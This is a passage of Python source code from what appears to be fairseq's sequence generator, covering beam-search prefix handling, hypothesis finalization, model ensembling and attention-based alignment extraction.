prefix_mask = prefix_toks.ne(self.pad)
lprobs[prefix_mask] = torch.tensor(-math.inf).to(lprobs)
lprobs[prefix_mask] = lprobs[prefix_mask].scatter(
-1, prefix_toks[prefix_mask].unsqueeze(-1), prefix_lprobs[prefix_mask]
)
# if prefix includes eos, then we should make sure tokens and
# scores are the same across all beams
eos_mask = prefix_toks.eq(self.eos)
if eos_mask.any():
# validate that the first beam matches the prefix
first_beam = tokens[eos_mask].view(-1, beam_size, tokens.size(-1))[
:, 0, 1 : step + 1
]
eos_mask_batch_dim = eos_mask.view(-1, beam_size)[:, 0]
target_prefix = prefix_tokens[eos_mask_batch_dim][:, :step]
assert (first_beam == target_prefix).all()
# copy tokens, scores and lprobs from the first beam to all beams
tokens = self.replicate_first_beam(tokens, eos_mask_batch_dim, beam_size)
scores = self.replicate_first_beam(scores, eos_mask_batch_dim, beam_size)
lprobs = self.replicate_first_beam(lprobs, eos_mask_batch_dim, beam_size)
return lprobs, tokens, scores
def replicate_first_beam(self, tensor, mask, beam_size: int):
tensor = tensor.view(-1, beam_size, tensor.size(-1))
tensor[mask] = tensor[mask][:, :1, :]
return tensor.view(-1, tensor.size(-1))
def finalize_hypos(
self,
step: int,
bbsz_idx,
eos_scores,
tokens,
scores,
finalized: List[List[Dict[str, Tensor]]],
finished: List[bool],
beam_size: int,
attn: Optional[Tensor],
src_lengths,
max_len: int,
):
"""Finalize hypothesis, store finalized information in `finalized`, and change `finished` accordingly.
A sentence is finalized when {beam_size} finished items have been collected for it.
Returns number of sentences (not beam items) being finalized.
These will be removed from the batch and not processed further.
Args:
bbsz_idx (Tensor):
"""
assert bbsz_idx.numel() == eos_scores.numel()
# clone relevant token and attention tensors.
# tokens is (batch * beam, max_len). So the index_select
# gets the newly EOS rows, then selects cols 1..{step + 2}
tokens_clone = tokens.index_select(0, bbsz_idx)[
:, 1 : step + 2
] # skip the first index, which is EOS
tokens_clone[:, step] = self.eos
attn_clone = (
attn.index_select(0, bbsz_idx)[:, :, 1 : step + 2]
if attn is not None
else None
)
# compute scores per token position
pos_scores = scores.index_select(0, bbsz_idx)[:, : step + 1]
pos_scores[:, step] = eos_scores
# convert from cumulative to per-position scores
pos_scores[:, 1:] = pos_scores[:, 1:] - pos_scores[:, :-1]
# normalize sentence-level scores
if self.normalize_scores:
eos_scores /= (step + 1) ** self.len_penalty
# cum_unfin records which sentences in the batch are finished.
# It helps match indexing between (a) the original sentences
# in the batch and (b) the current, possibly-reduced set of
# sentences.
cum_unfin: List[int] = []
prev = 0
for f in finished:
if f:
prev += 1
else:
cum_unfin.append(prev)
cum_fin_tensor = torch.tensor(cum_unfin, dtype=torch.int).to(bbsz_idx)
unfin_idx = torch.div(bbsz_idx, beam_size, rounding_mode="trunc")
sent = unfin_idx + torch.index_select(cum_fin_tensor, 0, unfin_idx)
# Create a set of "{sent}{unfin_idx}", where
# "unfin_idx" is the index in the current (possibly reduced)
# list of sentences, and "sent" is the index in the original,
# unreduced batch
# For every finished beam item
# sentence index in the current (possibly reduced) batch
seen = (sent << 32) + unfin_idx
unique_seen: List[int] = torch.unique(seen).tolist()
if self.match_source_len:
condition = step > torch.index_select(src_lengths, 0, unfin_idx)
eos_scores = torch.where(condition, torch.tensor(-math.inf), eos_scores)
sent_list: List[int] = sent.tolist()
for i in range(bbsz_idx.size()[0]):
# An input sentence (among those in a batch) is finished when
# beam_size hypotheses have been collected for it
if len(finalized[sent_list[i]]) < beam_size:
if attn_clone is not None:
# remove padding tokens from attn scores
hypo_attn = attn_clone[i]
else:
hypo_attn = torch.empty(0)
finalized[sent_list[i]].append(
{
"tokens": tokens_clone[i],
"score": eos_scores[i],
"attention": hypo_attn, # src_len x tgt_len
"alignment": torch.empty(0),
"positional_scores": pos_scores[i],
}
)
newly_finished: List[int] = []
for unique_s in unique_seen:
# check termination conditions for this sentence
unique_sent: int = unique_s >> 32
unique_unfin_idx: int = unique_s - (unique_sent << 32)
if not finished[unique_sent] and self.is_finished(
step, unique_unfin_idx, max_len, len(finalized[unique_sent]), beam_size
):
finished[unique_sent] = True
newly_finished.append(unique_unfin_idx)
return newly_finished
def is_finished(
self,
step: int,
unfin_idx: int,
max_len: int,
finalized_sent_len: int,
beam_size: int,
):
"""
Check whether decoding for a sentence is finished, which
occurs when the list of finalized sentences has reached the
beam size, or when we reach the maximum length.
"""
assert finalized_sent_len <= beam_size
if finalized_sent_len == beam_size or step == max_len:
return True
return False
class EnsembleModel(nn.Module):
"""A wrapper around an ensemble of models."""
def __init__(self, models):
super().__init__()
self.models_size = len(models)
# method '__len__' is not supported in ModuleList for torch script
self.single_model = models[0]
self.models = nn.ModuleList(models)
self.has_incremental: bool = False
if all(
hasattr(m, "decoder") and isinstance(m.decoder, FairseqIncrementalDecoder)
for m in models
):
self.has_incremental = True
def forward(self):
pass
def has_encoder(self):
return hasattr(self.single_model, "encoder")
def has_incremental_states(self):
return self.has_incremental
def max_decoder_positions(self):
return min(
[
m.max_decoder_positions()
for m in self.models
if hasattr(m, "max_decoder_positions")
]
+ [sys.maxsize]
)
def set_decoder_beam_size(self, beam_size):
"""Set beam size for efficient beamable enc-dec attention."""
if beam_size > 1:
for model in self.models:
if hasattr(model, "set_beam_size"):
model.set_beam_size(beam_size)
@torch.jit.export
def forward_encoder(self, net_input: Dict[str, Tensor]):
if not self.has_encoder():
return None
return [model.encoder.forward_torchscript(net_input) for model in self.models]
@torch.jit.export
def forward_decoder(
self,
tokens,
encoder_outs: List[Dict[str, List[Tensor]]],
incremental_states: List[Dict[str, Dict[str, Optional[Tensor]]]],
temperature: float = 1.0,
):
log_probs = []
avg_attn: Optional[Tensor] = None
encoder_out: Optional[Dict[str, List[Tensor]]] = None
for i, model in enumerate(self.models):
if self.has_encoder():
encoder_out = encoder_outs[i]
# decode each model
if self.has_incremental_states():
decoder_out = model.decoder.forward(
tokens,
encoder_out=encoder_out,
incremental_state=incremental_states[i],
)
else:
if hasattr(model, "decoder"):
decoder_out = model.decoder.forward(tokens, encoder_out=encoder_out)
else:
decoder_out = model.forward(tokens)
attn: Optional[Tensor] = None
decoder_len = len(decoder_out)
if decoder_len > 1 and decoder_out[1] is not None:
if isinstance(decoder_out[1], Tensor):
attn = decoder_out[1]
else:
attn_holder = decoder_out[1]["attn"]
if isinstance(attn_holder, Tensor):
attn = attn_holder
elif attn_holder is not None:
attn = attn_holder[0]
if attn is not None:
attn = attn[:, -1, :]
decoder_out_tuple = (
decoder_out[0][:, -1:, :].div_(temperature),
None if decoder_len <= 1 else decoder_out[1],
)
probs = model.get_normalized_probs(
decoder_out_tuple, log_probs=True, sample=None
)
probs = probs[:, -1, :]
if self.models_size == 1:
return probs, attn
log_probs.append(probs)
if attn is not None:
if avg_attn is None:
avg_attn = attn
else:
avg_attn.add_(attn)
avg_probs = torch.logsumexp(torch.stack(log_probs, dim=0), dim=0) - math.log(
self.models_size
)
if avg_attn is not None:
avg_attn.div_(self.models_size)
return avg_probs, avg_attn
@torch.jit.export
def reorder_encoder_out(
self, encoder_outs: Optional[List[Dict[str, List[Tensor]]]], new_order
):
"""
Reorder encoder output according to *new_order*.
Args:
encoder_out: output from the ``forward()`` method
new_order (LongTensor): desired order
Returns:
*encoder_out* rearranged according to *new_order*
"""
new_outs: List[Dict[str, List[Tensor]]] = []
if not self.has_encoder():
return new_outs
for i, model in enumerate(self.models):
assert encoder_outs is not None
new_outs.append(
model.encoder.reorder_encoder_out(encoder_outs[i], new_order)
)
return new_outs
@torch.jit.export
def reorder_incremental_state(
self,
incremental_states: List[Dict[str, Dict[str, Optional[Tensor]]]],
new_order,
):
if not self.has_incremental_states():
return
for i, model in enumerate(self.models):
model.decoder.reorder_incremental_state_scripting(
incremental_states[i], new_order
)
class SequenceGeneratorWithAlignment(SequenceGenerator):
def __init__(
self, models, tgt_dict, left_pad_target=False, print_alignment="hard", **kwargs
):
"""Generates translations of a given source sentence.
Produces alignments following "Jointly Learning to Align and
Translate with Transformer Models" (Garg et al., EMNLP 2019).
Args:
left_pad_target (bool, optional): Whether or not the
hypothesis should be left padded or not when they are
teacher forced for generating alignments.
"""
super().__init__(EnsembleModelWithAlignment(models), tgt_dict, **kwargs)
self.left_pad_target = left_pad_target
if print_alignment == "hard":
self.extract_alignment = utils.extract_hard_alignment
elif print_alignment == "soft":
self.extract_alignment = utils.extract_soft_alignment
@torch.no_grad()
def generate(self, models, sample, **kwargs):
finalized = super()._generate(sample, **kwargs)
src_tokens = sample["net_input"]["src_tokens"]
bsz = src_tokens.shape[0]
beam_size = self.beam_size
(
src_tokens,
src_lengths,
prev_output_tokens,
tgt_tokens,
) = self._prepare_batch_for_alignment(sample, finalized)
if any(getattr(m, "full_context_alignment", False) for m in self.model.models):
attn = self.model.forward_align(src_tokens, src_lengths, prev_output_tokens)
else:
attn = [
finalized[i // beam_size][i % beam_size]["attention"].transpose(1, 0)
for i in range(bsz * beam_size)
]
if src_tokens.device != "cpu":
src_tokens = src_tokens.to("cpu")
tgt_tokens = tgt_tokens.to("cpu")
attn = [i.to("cpu") for i in attn]
# Process the attn matrix to extract hard alignments.
for i in range(bsz * beam_size):
alignment = self.extract_alignment(
attn[i], src_tokens[i], tgt_tokens[i], self.pad, self.eos
)
finalized[i // beam_size][i % beam_size]["alignment"] = alignment
return finalized
def _prepare_batch_for_alignment(self, sample, hypothesis):
src_tokens = sample["net_input"]["src_tokens"]
bsz = src_tokens.shape[0]
src_tokens = (
src_tokens[:, None, :]
.expand(-1, self.beam_size, -1)
.contiguous()
.view(bsz * self.beam_size, -1)
)
src_lengths = sample["net_input"]["src_lengths"]
src_lengths = (
src_lengths[:, None]
.expand(-1, self.beam_size)
.contiguous()
.view(bsz * self.beam_size)
)
prev_output_tokens = data_utils.collate_tokens(
[beam["tokens"] for example in hypothesis for beam in example],
self.pad,
self.eos,
self.left_pad_target,
move_eos_to_beginning=True,
)
tgt_tokens = data_utils.collate_tokens(
[beam["tokens"] for example in hypothesis for beam in example],
self.pad,
self.eos,
self.left_pad_target,
move_eos_to_beginning=False,
)
return src_tokens, src_lengths, prev_output_tokens, tgt_tokens
class EnsembleModelWithAlignment(EnsembleModel):
"""A wrapper around an ensemble of models."""
def __init__(self, models):
super().__init__(models)
def forward_align(self, src_tokens, src_lengths, prev_output_tokens):
avg_attn = None
for model in self.models:
decoder_out = model(src_tokens, src_lengths, prev_output_tokens)
attn = decoder_out[1]["attn"][0]
if avg_attn is None:
avg_attn = attn
else:
avg_attn.add_(attn)
if len(self.models) > 1:
avg_attn.div_(len(self.models))
return avg_attn
| 39.859719 | 110 | 0.574837 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.